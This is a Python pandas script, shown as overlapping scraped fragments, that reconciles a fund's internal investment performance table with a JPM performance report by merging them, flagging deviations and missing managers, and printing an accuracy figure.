"lgs_dictionary_filepath = 'U:/CIO/#Data/input/lgs/dictionary/2020/06/New Dictionary_v10.xlsx' FYTD = 11 report_date = dt.datetime(2020, 5, 31) #", "accounts but are not checked. 
df_lgs_missing_completely = lgs_open_set - lgs_check_set - lgs_strategy_set -", ") df_jpm = pd.concat([df_jpm, df_sheet], sort=False) df_jpm = df_jpm.reset_index(drop=True) df_jpm = df_jpm.replace('-', np.nan)", "are not checked. df_lgs_missing_completely = lgs_open_set - lgs_check_set - lgs_strategy_set - lgs_liquidity_set -", "pd.isna(df_lgs_jpm[lgscolumn][i])): jpm_missing.append((df_lgs_jpm['JPM ReportName'][i], jpmcolumn)) total_count += 1 # Fixes the column names columns_fix", "df_lgs_jpm[df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) df_lgs_jpm = df_lgs_jpm[~df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) # Creates LGS to JPM column dictionary lgscolumn_to_jpmcolumn_dict =", "Footers.xlsx') remove_items = list(df_footers['Footers']) + [np.nan, 'Excess return'] df_jpm = df_jpm[~df_jpm['JPM ReportName'].isin(remove_items)].reset_index(drop=True) df_lgs_jpm", "', deviant_count, 'Accuracy: ', accuracy, '%') # Checks for managers that have been", "[] deviations = [] jpm_missing = [] lgs_missing = [] total_count = 0", "} for sheet, columns in sheet_to_columns_dict.items(): print('Accessing:', sheet) df_sheet = pd.read_excel( pd.ExcelFile(jpm_filepath), sheet_name=sheet,", "'Market Value_y', '1_Return': '1 Month', '3_Return': '3 Months', 'FYTD_Return': 'FYTD', '12_Return': '1 Year',", "# df_jpm_iap = pd.concat([df_jpm_iap, df_jpm_iap_temp], sort=False) # # df_jpm_iap = df_jpm_iap.rename(columns={'Account Id': 'Manager'}).reset_index(drop=True)", "= pd.read_excel( pd.ExcelFile(jpm_filepath), sheet_name=sheet, usecols=columns, skiprows=[0, 1, 2] ) df_sheet = df_sheet.rename( columns={", "= lgs_open_set - lgs_check_set - lgs_strategy_set - lgs_liquidity_set - {np.nan} # Prints open", "# Calculates accuracy accuracy = round(((total_count - deviant_count)/total_count)*100, 2) # Prints accuracy results", "'Page 3 NOF': 'A:N', 'Page 5 NOF': 'B:O', 'Page 6 NOF': 'B:O', 'Page", "df_lgs_dict[df_lgs_dict['LGS 
Liquidity'].isin([1])].reset_index(drop=True) df_lgs_liquidity = df_lgs_liquidity.rename(columns={'LGS Name': 'Manager'}) lgs_liquidity_set = set(list(df_lgs_liquidity['Manager'])) # Creates set", "Liquidity'].isin([1])].reset_index(drop=True) df_lgs_liquidity = df_lgs_liquidity.rename(columns={'LGS Name': 'Manager'}) lgs_liquidity_set = set(list(df_lgs_liquidity['Manager'])) # Creates set containing", "JPM IAP with JPM HTS # df_jpm_main = pd\\ # .merge( # left=df_jpm_iap,", "Month', '3_Return': '3 Months', 'FYTD_Return': 'FYTD', '12_Return': '1 Year', '36_Return': '3 Years', '60_Return':", "open accounts that are missing from LGS. print('\\nMissing completely from LGS', df_lgs_missing_completely) #", "'JPM ReportName', } ) if sheet == 'Page 8': df_sheet = df_sheet.rename( columns={", "jpm_missing = [] lgs_missing = [] total_count = 0 deviant_count = 0 for", "'5 Years', '84_Return': '7 Years' } # Performs the deviant check df_deviations =", "df_lgs = pd.read_csv(lgs_filepath) # Reads LGS dictionary df_lgs_dict = pd.read_excel( pd.ExcelFile(lgs_dictionary_filepath), sheet_name='Sheet1', header=0", "check df_deviations = pd.DataFrame() deviants = [] columns = [] deviations = []", "'Manager'}).reset_index(drop=True) # df_jpm_iap = df_jpm_iap[['Manager', 'Date', 'Market Value']] # # # Merges the", "set(list(df_lgs_liquidity['Manager'])) # Creates set containing fund managers that have been checked. lgs_check_set =", "= df_jpm_iap[['Manager', 'Date', 'Market Value']] # # # Merges the market values from", "df_lgs_jpm[~df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) # Creates LGS to JPM column dictionary lgscolumn_to_jpmcolumn_dict = { 'Market Value_x':", "NOF': 'A:N', 'Page 5 NOF': 'B:O', 'Page 6 NOF': 'B:O', 'Page 7 NOF':", "liquidity accounts. 
df_lgs_liquidity = df_lgs_dict[df_lgs_dict['LGS Liquidity'].isin([1])].reset_index(drop=True) df_lgs_liquidity = df_lgs_liquidity.rename(columns={'LGS Name': 'Manager'}) lgs_liquidity_set =", "pd.read_excel( pd.ExcelFile(lgs_dictionary_filepath), sheet_name='Sheet1', header=0 ) # Reads JPM Performance Report df_jpm = pd.DataFrame()", "lgs_open_set = set(list(df_lgs_open['Manager'])) # Creates set containing strategies. df_lgs_strategy = df_lgs_dict[df_lgs_dict['LGS Strategy Aggregate'].isin([1])].reset_index(drop=True)", "and (not pd.isna(df_lgs_jpm[lgscolumn][i])): jpm_missing.append((df_lgs_jpm['JPM ReportName'][i], jpmcolumn)) total_count += 1 # Fixes the column", "left=df_jpm_iap, # right=df_jpm, # left_on=['Manager', 'Date'], # right_on=['Manager', 'Date'], # how='right' # )\\", "0': 'ModelCode', 'Unnamed: 1': 'JPM ReportName', 'Unnamed: 2': 'JPM ReportName', } ) if", "1], # header=0 # ) # df_jpm_iap_temp['Date'] = dt.datetime(int(filename[:4]), int(filename[4:6]), int(filename[6:8])) # df_jpm_iap", "11 report_date = dt.datetime(2020, 5, 31) # End USER INPUT # Reads LGS", "deviant check df_deviations = pd.DataFrame() deviants = [] columns = [] deviations =", "5, 31) # End USER INPUT # Reads LGS table df_lgs = pd.read_csv(lgs_filepath)", "# right=df_jpm, # left_on=['Manager', 'Date'], # right_on=['Manager', 'Date'], # how='right' # )\\ #", "= pd.ExcelFile(jpm_iap_filepath + filename) # df_jpm_iap_temp = pd.read_excel( # jpm_iap_xlsx, # sheet_name='Sheet1', #", "pd.DataFrame(lgs_missing, columns=['Manager', 'Column']) df_jpm_missing = pd.DataFrame(jpm_missing, columns=['Manager', 'Column']) # Calculates accuracy accuracy =", "df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 4': 'JPM ReportName', } ) df_jpm =", "# df_jpm_iap = pd.DataFrame() # for filename in jpm_iap_filenames: # jpm_iap_xlsx = pd.ExcelFile(jpm_iap_filepath", "print('Total Count: ', total_count, 'Deviant Count: ', deviant_count, 'Accuracy: ', accuracy, '%') #", "2': 'JPM 
ReportName', } ) if sheet == 'Page 8': df_sheet = df_sheet.rename(", "from JPM', jpm_missing) print('\\nThe deviants are:\\n') print(df_deviations, '\\n') print('Total Count: ', total_count, 'Deviant", "LGS table df_lgs = pd.read_csv(lgs_filepath) # Reads LGS dictionary df_lgs_dict = pd.read_excel( pd.ExcelFile(lgs_dictionary_filepath),", "(df_jpm['Market Value']/1000000).round(2) # Reads footers and removes them df_footers = pd.read_excel('U:/CIO/#Investment_Report/Data/input/testing/20191031 Footers.xlsx') remove_items", "in columns: if column == 'Market Value_y': columns_fix.append('Market Value') else: columns_fix.append(column) df_deviations['Manager'] =", "been completely missed. # Creates set containing fund managers that are currently open", "# jpm_iap_filenames = sorted(os.listdir(jpm_iap_filepath)) # df_jpm_iap = pd.DataFrame() # for filename in jpm_iap_filenames:", "= df_jpm[~df_jpm['JPM ReportName'].isin(remove_items)].reset_index(drop=True) df_lgs_jpm = pd.merge( left=df_lgs, right=df_jpm, on=['JPM ReportName'], how='outer' ) df_later", "Creates set containing fund managers that are currently open accounts. df_lgs_open = df_lgs_dict[df_lgs_dict['LGS", "managers that have been checked. lgs_check_set = set(list(df_lgs_jpm['Manager'])) # Creates set containing fund", "filename) # df_jpm_iap_temp = pd.read_excel( # jpm_iap_xlsx, # sheet_name='Sheet1', # skiprows=[0, 1], #", "sheet == 'Page 8': df_sheet = df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 4':", "'%') # Checks for managers that have been completely missed. # Creates set", "'Unnamed: 2': 'JPM ReportName', } ) if sheet == 'Page 8': df_sheet =", "# Reads LGS table df_lgs = pd.read_csv(lgs_filepath) # Reads LGS dictionary df_lgs_dict =", "strategies. 
df_lgs_strategy = df_lgs_dict[df_lgs_dict['LGS Strategy Aggregate'].isin([1])].reset_index(drop=True) df_lgs_strategy = df_lgs_strategy.rename(columns={'LGS Name': 'Manager'}) lgs_strategy_set =", "By ID; Include Closed Accounts; Select All; Mode: Portfolio Only # jpm_iap_filepath =", "Portfolio Only # jpm_iap_filepath = 'U:/CIO/#Investment_Report/Data/input/testing/jpm_iap/' # jpm_iap_filenames = sorted(os.listdir(jpm_iap_filepath)) # df_jpm_iap =", "== 'Market Value_y': columns_fix.append('Market Value') else: columns_fix.append(column) df_deviations['Manager'] = deviants df_deviations['Column'] = columns_fix", "lgs_check_set = set(list(df_lgs_jpm['Manager'])) # Creates set containing fund managers that are open accounts", "not checked. df_lgs_missing_completely = lgs_open_set - lgs_check_set - lgs_strategy_set - lgs_liquidity_set - {np.nan}", "# Performs the deviant check df_deviations = pd.DataFrame() deviants = [] columns =", "lgs_liquidity_set = set(list(df_lgs_liquidity['Manager'])) # Creates set containing fund managers that have been checked.", "+ filename) # df_jpm_iap_temp = pd.read_excel( # jpm_iap_xlsx, # sheet_name='Sheet1', # skiprows=[0, 1],", "datetime as dt import numpy as np import pandas as pd # START", ">= 0.01: deviants.append(df_lgs_jpm['Manager'][i]) columns.append(jpmcolumn) deviations.append(deviation) deviant_count += 1 if (not pd.isna(df_lgs_jpm[jpmcolumn][i])) and (pd.isna(df_lgs_jpm[lgscolumn][i])):", "during check from LGS', lgs_missing) print('\\nMissing during check from JPM', jpm_missing) print('\\nThe deviants", "header=0 ) # Reads JPM Performance Report df_jpm = pd.DataFrame() sheet_to_columns_dict = {", "ID; Include Closed Accounts; Select All; Mode: Portfolio Only # jpm_iap_filepath = 'U:/CIO/#Investment_Report/Data/input/testing/jpm_iap/'", "Name': 'Manager'}) lgs_strategy_set = set(list(df_lgs_strategy['Manager'])) # Creates set containing liquidity accounts. 
df_lgs_liquidity =", "'Page 8': 'D:O' } for sheet, columns in sheet_to_columns_dict.items(): print('Accessing:', sheet) df_sheet =", "print('Accessing:', sheet) df_sheet = pd.read_excel( pd.ExcelFile(jpm_filepath), sheet_name=sheet, usecols=columns, skiprows=[0, 1, 2] ) df_sheet", "= [] jpm_missing = [] lgs_missing = [] total_count = 0 deviant_count =", "jpm_missing.append((df_lgs_jpm['JPM ReportName'][i], jpmcolumn)) total_count += 1 # Fixes the column names columns_fix =", "# .merge( # left=df_jpm_iap, # right=df_jpm, # left_on=['Manager', 'Date'], # right_on=['Manager', 'Date'], #", "'ModelCode', 'Unnamed: 1': 'JPM ReportName', 'Unnamed: 2': 'JPM ReportName', } ) if sheet", "} ) df_jpm = pd.concat([df_jpm, df_sheet], sort=False) df_jpm = df_jpm.reset_index(drop=True) df_jpm = df_jpm.replace('-',", "Prints accuracy results print('\\nMissing during check from LGS', lgs_missing) print('\\nMissing during check from", "ReportName', } ) df_jpm = pd.concat([df_jpm, df_sheet], sort=False) df_jpm = df_jpm.reset_index(drop=True) df_jpm =", "1': 'JPM ReportName', 'Unnamed: 2': 'JPM ReportName', } ) if sheet == 'Page", "Creates set containing fund managers that have been checked. lgs_check_set = set(list(df_lgs_jpm['Manager'])) #", "containing fund managers that are open accounts but are not checked. 
df_lgs_missing_completely =", "if deviation >= 0.01: deviants.append(df_lgs_jpm['Manager'][i]) columns.append(jpmcolumn) deviations.append(deviation) deviant_count += 1 if (not pd.isna(df_lgs_jpm[jpmcolumn][i]))", "[] for column in columns: if column == 'Market Value_y': columns_fix.append('Market Value') else:", "= dt.datetime(int(filename[:4]), int(filename[4:6]), int(filename[6:8])) # df_jpm_iap = pd.concat([df_jpm_iap, df_jpm_iap_temp], sort=False) # # df_jpm_iap", "Value_y', '1_Return': '1 Month', '3_Return': '3 Months', 'FYTD_Return': 'FYTD', '12_Return': '1 Year', '36_Return':", "'7 Years' } # Performs the deviant check df_deviations = pd.DataFrame() deviants =", "checked. lgs_check_set = set(list(df_lgs_jpm['Manager'])) # Creates set containing fund managers that are open", "= 'U:/CIO/#Investment_Report/Data/input/testing/jpm_iap/' # jpm_iap_filenames = sorted(os.listdir(jpm_iap_filepath)) # df_jpm_iap = pd.DataFrame() # for filename", "= deviations df_lgs_missing = pd.DataFrame(lgs_missing, columns=['Manager', 'Column']) df_jpm_missing = pd.DataFrame(jpm_missing, columns=['Manager', 'Column']) #", "df_jpm_iap[['Manager', 'Date', 'Market Value']] # # # Merges the market values from JPM", "'1 Year', '36_Return': '3 Years', '60_Return': '5 Years', '84_Return': '7 Years' } #", "df_jpm = df_jpm[~df_jpm['JPM ReportName'].isin(remove_items)].reset_index(drop=True) df_lgs_jpm = pd.merge( left=df_lgs, right=df_jpm, on=['JPM ReportName'], how='outer' )", "Value_y': columns_fix.append('Market Value') else: columns_fix.append(column) df_deviations['Manager'] = deviants df_deviations['Column'] = columns_fix df_deviations['Deviations'] =", "= pd.merge( left=df_lgs, right=df_jpm, on=['JPM ReportName'], how='outer' ) df_later = df_lgs_jpm[df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) df_lgs_jpm =", "deviations df_lgs_missing = pd.DataFrame(lgs_missing, columns=['Manager', 'Column']) df_jpm_missing = pd.DataFrame(jpm_missing, columns=['Manager', 'Column']) # 
Calculates", "from LGS', lgs_missing) print('\\nMissing during check from JPM', jpm_missing) print('\\nThe deviants are:\\n') print(df_deviations,", "# End USER INPUT # Reads LGS table df_lgs = pd.read_csv(lgs_filepath) # Reads", "pandas as pd # START USER INPUT lgs_filepath = 'U:/CIO/#Data/output/investment/checker/lgs_table.csv' jpm_filepath = 'U:/CIO/#Data/input/jpm/report/investment/LGSS", "df_lgs_liquidity = df_lgs_dict[df_lgs_dict['LGS Liquidity'].isin([1])].reset_index(drop=True) df_lgs_liquidity = df_lgs_liquidity.rename(columns={'LGS Name': 'Manager'}) lgs_liquidity_set = set(list(df_lgs_liquidity['Manager'])) #", "df_lgs_strategy.rename(columns={'LGS Name': 'Manager'}) lgs_strategy_set = set(list(df_lgs_strategy['Manager'])) # Creates set containing liquidity accounts. df_lgs_liquidity", "= { 'Market Value_x': 'Market Value_y', '1_Return': '1 Month', '3_Return': '3 Months', 'FYTD_Return':", "pd.read_excel('U:/CIO/#Investment_Report/Data/input/testing/20191031 Footers.xlsx') remove_items = list(df_footers['Footers']) + [np.nan, 'Excess return'] df_jpm = df_jpm[~df_jpm['JPM ReportName'].isin(remove_items)].reset_index(drop=True)", "lgs_open_set - lgs_check_set - lgs_strategy_set - lgs_liquidity_set - {np.nan} # Prints open accounts", "df_jpm_main = pd\\ # .merge( # left=df_jpm_iap, # right=df_jpm, # left_on=['Manager', 'Date'], #", "= df_lgs_open.rename(columns={'LGS Name': 'Manager'}) lgs_open_set = set(list(df_lgs_open['Manager'])) # Creates set containing strategies. 
df_lgs_strategy", "left=df_lgs, right=df_jpm, on=['JPM ReportName'], how='outer' ) df_later = df_lgs_jpm[df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) df_lgs_jpm = df_lgs_jpm[~df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) #", "= df_jpm.drop(columns=['ModelCode'], axis=1) df_jpm['Market Value'] = (df_jpm['Market Value']/1000000).round(2) # Reads footers and removes", "df_jpm['Market Value'] = (df_jpm['Market Value']/1000000).round(2) # Reads footers and removes them df_footers =", "column == 'Market Value_y': columns_fix.append('Market Value') else: columns_fix.append(column) df_deviations['Manager'] = deviants df_deviations['Column'] =", "'Unnamed: 0': 'ModelCode', 'Unnamed: 4': 'JPM ReportName', } ) df_jpm = pd.concat([df_jpm, df_sheet],", "0': 'ModelCode', 'Unnamed: 4': 'JPM ReportName', } ) df_jpm = pd.concat([df_jpm, df_sheet], sort=False)", "import datetime as dt import numpy as np import pandas as pd #", "sheet) df_sheet = pd.read_excel( pd.ExcelFile(jpm_filepath), sheet_name=sheet, usecols=columns, skiprows=[0, 1, 2] ) df_sheet =", "df_jpm_iap = df_jpm_iap.rename(columns={'Account Id': 'Manager'}).reset_index(drop=True) # df_jpm_iap = df_jpm_iap[['Manager', 'Date', 'Market Value']] #", "jpm_iap_xlsx = pd.ExcelFile(jpm_iap_filepath + filename) # df_jpm_iap_temp = pd.read_excel( # jpm_iap_xlsx, # sheet_name='Sheet1',", "df_deviations['Column'] = columns_fix df_deviations['Deviations'] = deviations df_lgs_missing = pd.DataFrame(lgs_missing, columns=['Manager', 'Column']) df_jpm_missing =", "df_lgs_strategy = df_lgs_dict[df_lgs_dict['LGS Strategy Aggregate'].isin([1])].reset_index(drop=True) df_lgs_strategy = df_lgs_strategy.rename(columns={'LGS Name': 'Manager'}) lgs_strategy_set = set(list(df_lgs_strategy['Manager']))", "All; Mode: Portfolio Only # jpm_iap_filepath = 'U:/CIO/#Investment_Report/Data/input/testing/jpm_iap/' # jpm_iap_filenames = sorted(os.listdir(jpm_iap_filepath)) #", "check from LGS', lgs_missing) 
print('\\nMissing during check from JPM', jpm_missing) print('\\nThe deviants are:\\n')", "= pd.DataFrame() deviants = [] columns = [] deviations = [] jpm_missing =", "'Manager'}) lgs_liquidity_set = set(list(df_lgs_liquidity['Manager'])) # Creates set containing fund managers that have been", "Reads JPM Performance Report df_jpm = pd.DataFrame() sheet_to_columns_dict = { 'Page 3 NOF':", "[] columns = [] deviations = [] jpm_missing = [] lgs_missing = []", "set containing strategies. df_lgs_strategy = df_lgs_dict[df_lgs_dict['LGS Strategy Aggregate'].isin([1])].reset_index(drop=True) df_lgs_strategy = df_lgs_strategy.rename(columns={'LGS Name': 'Manager'})", "lgscolumn_to_jpmcolumn_dict = { 'Market Value_x': 'Market Value_y', '1_Return': '1 Month', '3_Return': '3 Months',", "End USER INPUT # Reads LGS table df_lgs = pd.read_csv(lgs_filepath) # Reads LGS", "df_lgs_liquidity = df_lgs_liquidity.rename(columns={'LGS Name': 'Manager'}) lgs_liquidity_set = set(list(df_lgs_liquidity['Manager'])) # Creates set containing fund", "# left_on=['Manager', 'Date'], # right_on=['Manager', 'Date'], # how='right' # )\\ # .sort_values(['Manager', 'Date'])\\", "deviant_count, 'Accuracy: ', accuracy, '%') # Checks for managers that have been completely", "containing fund managers that are currently open accounts. df_lgs_open = df_lgs_dict[df_lgs_dict['LGS Open'].isin([1])].reset_index(drop=True) df_lgs_open", "lgs_liquidity_set - {np.nan} # Prints open accounts that are missing from LGS. 
print('\\nMissing", "'Market Value_x': 'Market Value_y', '1_Return': '1 Month', '3_Return': '3 Months', 'FYTD_Return': 'FYTD', '12_Return':", "# df_jpm_iap_temp = pd.read_excel( # jpm_iap_xlsx, # sheet_name='Sheet1', # skiprows=[0, 1], # header=0", "= 0 deviant_count = 0 for lgscolumn, jpmcolumn in lgscolumn_to_jpmcolumn_dict.items(): for i in", "# ) # df_jpm_iap_temp['Date'] = dt.datetime(int(filename[:4]), int(filename[4:6]), int(filename[6:8])) # df_jpm_iap = pd.concat([df_jpm_iap, df_jpm_iap_temp],", "'D:O' } for sheet, columns in sheet_to_columns_dict.items(): print('Accessing:', sheet) df_sheet = pd.read_excel( pd.ExcelFile(jpm_filepath),", "Performance 202005.xlsx' lgs_dictionary_filepath = 'U:/CIO/#Data/input/lgs/dictionary/2020/06/New Dictionary_v10.xlsx' FYTD = 11 report_date = dt.datetime(2020, 5,", "[] jpm_missing = [] lgs_missing = [] total_count = 0 deviant_count = 0", "df_lgs_dict[df_lgs_dict['LGS Open'].isin([1])].reset_index(drop=True) df_lgs_open = df_lgs_open.rename(columns={'LGS Name': 'Manager'}) lgs_open_set = set(list(df_lgs_open['Manager'])) # Creates set", "set containing fund managers that have been checked. lgs_check_set = set(list(df_lgs_jpm['Manager'])) # Creates", "pd.concat([df_jpm_iap, df_jpm_iap_temp], sort=False) # # df_jpm_iap = df_jpm_iap.rename(columns={'Account Id': 'Manager'}).reset_index(drop=True) # df_jpm_iap =", "Report df_jpm = pd.DataFrame() sheet_to_columns_dict = { 'Page 3 NOF': 'A:N', 'Page 5", "INPUT lgs_filepath = 'U:/CIO/#Data/output/investment/checker/lgs_table.csv' jpm_filepath = 'U:/CIO/#Data/input/jpm/report/investment/LGSS Preliminary Performance 202005.xlsx' lgs_dictionary_filepath = 'U:/CIO/#Data/input/lgs/dictionary/2020/06/New", "that are missing from LGS. 
print('\\nMissing completely from LGS', df_lgs_missing_completely) # Import JPM_IAP,", "(not pd.isna(df_lgs_jpm[lgscolumn][i])): jpm_missing.append((df_lgs_jpm['JPM ReportName'][i], jpmcolumn)) total_count += 1 # Fixes the column names", "column dictionary lgscolumn_to_jpmcolumn_dict = { 'Market Value_x': 'Market Value_y', '1_Return': '1 Month', '3_Return':", "columns_fix.append(column) df_deviations['Manager'] = deviants df_deviations['Column'] = columns_fix df_deviations['Deviations'] = deviations df_lgs_missing = pd.DataFrame(lgs_missing,", "= 'U:/CIO/#Data/input/lgs/dictionary/2020/06/New Dictionary_v10.xlsx' FYTD = 11 report_date = dt.datetime(2020, 5, 31) # End", "np import pandas as pd # START USER INPUT lgs_filepath = 'U:/CIO/#Data/output/investment/checker/lgs_table.csv' jpm_filepath", "columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 1': 'JPM ReportName', 'Unnamed: 2': 'JPM ReportName', }", "df_deviations['Deviations'] = deviations df_lgs_missing = pd.DataFrame(lgs_missing, columns=['Manager', 'Column']) df_jpm_missing = pd.DataFrame(jpm_missing, columns=['Manager', 'Column'])", "df_deviations = pd.DataFrame() deviants = [] columns = [] deviations = [] jpm_missing", "pd.concat([df_jpm, df_sheet], sort=False) df_jpm = df_jpm.reset_index(drop=True) df_jpm = df_jpm.replace('-', np.nan) df_jpm = df_jpm.drop(columns=['ModelCode'],", "# for filename in jpm_iap_filenames: # jpm_iap_xlsx = pd.ExcelFile(jpm_iap_filepath + filename) # df_jpm_iap_temp", "= dt.datetime(2020, 5, 31) # End USER INPUT # Reads LGS table df_lgs", "# Reads JPM Performance Report df_jpm = pd.DataFrame() sheet_to_columns_dict = { 'Page 3", "# START USER INPUT lgs_filepath = 'U:/CIO/#Data/output/investment/checker/lgs_table.csv' jpm_filepath = 'U:/CIO/#Data/input/jpm/report/investment/LGSS Preliminary Performance 202005.xlsx'", ") # df_jpm_iap_temp['Date'] = dt.datetime(int(filename[:4]), int(filename[4:6]), int(filename[6:8])) # df_jpm_iap = pd.concat([df_jpm_iap, df_jpm_iap_temp], 
sort=False)", "# Merges the market values from JPM IAP with JPM HTS # df_jpm_main", "= [] lgs_missing = [] total_count = 0 deviant_count = 0 for lgscolumn,", "left_on=['Manager', 'Date'], # right_on=['Manager', 'Date'], # how='right' # )\\ # .sort_values(['Manager', 'Date'])\\ #", "columns_fix = [] for column in columns: if column == 'Market Value_y': columns_fix.append('Market", "= (df_jpm['Market Value']/1000000).round(2) # Reads footers and removes them df_footers = pd.read_excel('U:/CIO/#Investment_Report/Data/input/testing/20191031 Footers.xlsx')", "# Checks for managers that have been completely missed. # Creates set containing", "= columns_fix df_deviations['Deviations'] = deviations df_lgs_missing = pd.DataFrame(lgs_missing, columns=['Manager', 'Column']) df_jpm_missing = pd.DataFrame(jpm_missing,", "Count: ', deviant_count, 'Accuracy: ', accuracy, '%') # Checks for managers that have", "= { 'Page 3 NOF': 'A:N', 'Page 5 NOF': 'B:O', 'Page 6 NOF':", "Prints open accounts that are missing from LGS. print('\\nMissing completely from LGS', df_lgs_missing_completely)", "numpy as np import pandas as pd # START USER INPUT lgs_filepath =", "set(list(df_lgs_open['Manager'])) # Creates set containing strategies. 
df_lgs_strategy = df_lgs_dict[df_lgs_dict['LGS Strategy Aggregate'].isin([1])].reset_index(drop=True) df_lgs_strategy =", "on=['JPM ReportName'], how='outer' ) df_later = df_lgs_jpm[df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) df_lgs_jpm = df_lgs_jpm[~df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) # Creates LGS", "deviation >= 0.01: deviants.append(df_lgs_jpm['Manager'][i]) columns.append(jpmcolumn) deviations.append(deviation) deviant_count += 1 if (not pd.isna(df_lgs_jpm[jpmcolumn][i])) and", "columns=['Manager', 'Column']) df_jpm_missing = pd.DataFrame(jpm_missing, columns=['Manager', 'Column']) # Calculates accuracy accuracy = round(((total_count", "df_jpm_iap_temp], sort=False) # # df_jpm_iap = df_jpm_iap.rename(columns={'Account Id': 'Manager'}).reset_index(drop=True) # df_jpm_iap = df_jpm_iap[['Manager',", "Months', 'FYTD_Return': 'FYTD', '12_Return': '1 Year', '36_Return': '3 Years', '60_Return': '5 Years', '84_Return':", "= pd.DataFrame(jpm_missing, columns=['Manager', 'Column']) # Calculates accuracy accuracy = round(((total_count - deviant_count)/total_count)*100, 2)", "usecols=columns, skiprows=[0, 1, 2] ) df_sheet = df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed:", "'\\n') print('Total Count: ', total_count, 'Deviant Count: ', deviant_count, 'Accuracy: ', accuracy, '%')", "round(((total_count - deviant_count)/total_count)*100, 2) # Prints accuracy results print('\\nMissing during check from LGS',", "'3 Months', 'FYTD_Return': 'FYTD', '12_Return': '1 Year', '36_Return': '3 Years', '60_Return': '5 Years',", "= pd\\ # .merge( # left=df_jpm_iap, # right=df_jpm, # left_on=['Manager', 'Date'], # right_on=['Manager',", "columns_fix df_deviations['Deviations'] = deviations df_lgs_missing = pd.DataFrame(lgs_missing, columns=['Manager', 'Column']) df_jpm_missing = pd.DataFrame(jpm_missing, columns=['Manager',", "Only # jpm_iap_filepath = 'U:/CIO/#Investment_Report/Data/input/testing/jpm_iap/' # jpm_iap_filenames = 
sorted(os.listdir(jpm_iap_filepath)) # df_jpm_iap = pd.DataFrame()", "{ 'Market Value_x': 'Market Value_y', '1_Return': '1 Month', '3_Return': '3 Months', 'FYTD_Return': 'FYTD',", "Years', '60_Return': '5 Years', '84_Return': '7 Years' } # Performs the deviant check", "# Reads footers and removes them df_footers = pd.read_excel('U:/CIO/#Investment_Report/Data/input/testing/20191031 Footers.xlsx') remove_items = list(df_footers['Footers'])", "'Page 5 NOF': 'B:O', 'Page 6 NOF': 'B:O', 'Page 7 NOF': 'B:O', 'Page", "'FYTD', '12_Return': '1 Year', '36_Return': '3 Years', '60_Return': '5 Years', '84_Return': '7 Years'", "'U:/CIO/#Data/input/lgs/dictionary/2020/06/New Dictionary_v10.xlsx' FYTD = 11 report_date = dt.datetime(2020, 5, 31) # End USER", "in range(0, len(df_lgs_jpm)): deviation = df_lgs_jpm[lgscolumn][i] - df_lgs_jpm[jpmcolumn][i] if deviation >= 0.01: deviants.append(df_lgs_jpm['Manager'][i])", "int(filename[6:8])) # df_jpm_iap = pd.concat([df_jpm_iap, df_jpm_iap_temp], sort=False) # # df_jpm_iap = df_jpm_iap.rename(columns={'Account Id':", "check from JPM', jpm_missing) print('\\nThe deviants are:\\n') print(df_deviations, '\\n') print('Total Count: ', total_count,", "them df_footers = pd.read_excel('U:/CIO/#Investment_Report/Data/input/testing/20191031 Footers.xlsx') remove_items = list(df_footers['Footers']) + [np.nan, 'Excess return'] df_jpm", "= df_lgs_dict[df_lgs_dict['LGS Liquidity'].isin([1])].reset_index(drop=True) df_lgs_liquidity = df_lgs_liquidity.rename(columns={'LGS Name': 'Manager'}) lgs_liquidity_set = set(list(df_lgs_liquidity['Manager'])) # Creates", ") df_sheet = df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 1': 'JPM ReportName', 'Unnamed:", "columns in sheet_to_columns_dict.items(): print('Accessing:', sheet) df_sheet = pd.read_excel( pd.ExcelFile(jpm_filepath), sheet_name=sheet, usecols=columns, skiprows=[0, 1,", "lgscolumn, jpmcolumn in lgscolumn_to_jpmcolumn_dict.items(): for i in range(0, len(df_lgs_jpm)): deviation = 
df_lgs_jpm[lgscolumn][i] -", "df_jpm_iap_temp['Date'] = dt.datetime(int(filename[:4]), int(filename[4:6]), int(filename[6:8])) # df_jpm_iap = pd.concat([df_jpm_iap, df_jpm_iap_temp], sort=False) # #", "deviants df_deviations['Column'] = columns_fix df_deviations['Deviations'] = deviations df_lgs_missing = pd.DataFrame(lgs_missing, columns=['Manager', 'Column']) df_jpm_missing", "are open accounts but are not checked. df_lgs_missing_completely = lgs_open_set - lgs_check_set -", "import numpy as np import pandas as pd # START USER INPUT lgs_filepath", "'3_Return': '3 Months', 'FYTD_Return': 'FYTD', '12_Return': '1 Year', '36_Return': '3 Years', '60_Return': '5", "df_lgs_missing_completely) # Import JPM_IAP, Accounts; By ID; Include Closed Accounts; Select All; Mode:", "dt import numpy as np import pandas as pd # START USER INPUT", "'Page 8': df_sheet = df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 4': 'JPM ReportName',", "'3 Years', '60_Return': '5 Years', '84_Return': '7 Years' } # Performs the deviant", "pd.ExcelFile(jpm_iap_filepath + filename) # df_jpm_iap_temp = pd.read_excel( # jpm_iap_xlsx, # sheet_name='Sheet1', # skiprows=[0,", "sheet_to_columns_dict.items(): print('Accessing:', sheet) df_sheet = pd.read_excel( pd.ExcelFile(jpm_filepath), sheet_name=sheet, usecols=columns, skiprows=[0, 1, 2] )", "deviants.append(df_lgs_jpm['Manager'][i]) columns.append(jpmcolumn) deviations.append(deviation) deviant_count += 1 if (not pd.isna(df_lgs_jpm[jpmcolumn][i])) and (pd.isna(df_lgs_jpm[lgscolumn][i])): lgs_missing.append((df_lgs_jpm['Manager'][i], lgscolumn))", "for lgscolumn, jpmcolumn in lgscolumn_to_jpmcolumn_dict.items(): for i in range(0, len(df_lgs_jpm)): deviation = df_lgs_jpm[lgscolumn][i]", "5 NOF': 'B:O', 'Page 6 NOF': 'B:O', 'Page 7 NOF': 'B:O', 'Page 8':", "for i in range(0, 